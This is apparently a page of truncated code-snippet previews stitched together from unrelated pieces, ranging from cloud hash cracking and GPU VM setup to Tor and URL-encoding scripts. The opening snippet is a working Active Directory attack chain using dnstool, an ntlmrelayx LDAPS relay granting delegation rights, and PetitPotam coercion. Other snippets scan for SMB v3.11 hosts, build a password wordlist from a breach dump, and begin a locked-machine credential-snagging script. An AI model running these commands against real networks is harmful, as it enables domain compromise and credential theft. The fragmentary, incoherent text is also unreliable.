This document is under construction, but is intended to get you up and running quickly with cracking hashes in the cloud using the Paperspace service.
Resources used for this article:
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local
# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da
# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER |
# Start with a DNS domain as seed, and do some recon to check if domain is M365 / Azure tenant hosted
# Insert your domain environment variable below
$DOMAIN = "microsoft.com"
# Check the getuserrealm.srf endpoint for domain information
# Check autodiscover.$DOMAIN DNS entry
host autodiscover.$DOMAIN
# Note: Checks autodiscover forward lookup ~ you should see a CNAME record for autodiscover.$DOMAIN pointing to autodiscover.outlook.com
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" $1 "..."
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+' |
In February 2017, Google announced the availability of GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.
Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.
#!/bin/sh
###
#
# Change Tor exit node
#
# Sometimes when using Tor you'd like to change the IP address that
# servers see when you connect (that is, change your Tor exit node).
# This happens automatically from time to time, but this shell script
# lets you force it.
# |
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size: |
#-*- encoding: UTF-8 -*-
import os
import sys
import re
PROXY = '%s.myproxy.com' % os.environ.get('host','')
lines = sys.stdin.readlines()
html = ''.join( lines ) |
urlencode() {
# urlencode <string>
old_lc_collate=$LC_COLLATE
LC_COLLATE=C
local length="${#1}"
for (( i = 0; i < length; i++ )); do
local c="${1:i:1}"
case $c in
[a-zA-Z0-9.~_-]) printf "$c" ;; |
#!/bin/bash
#
# Attack created by Mubix. For more information see:
# https://room362.com/post/2016/snagging-creds-from-locked-machines
# Modified for Nethunter by Binkybear
#
# ================== #
# Check for root
# ================== # |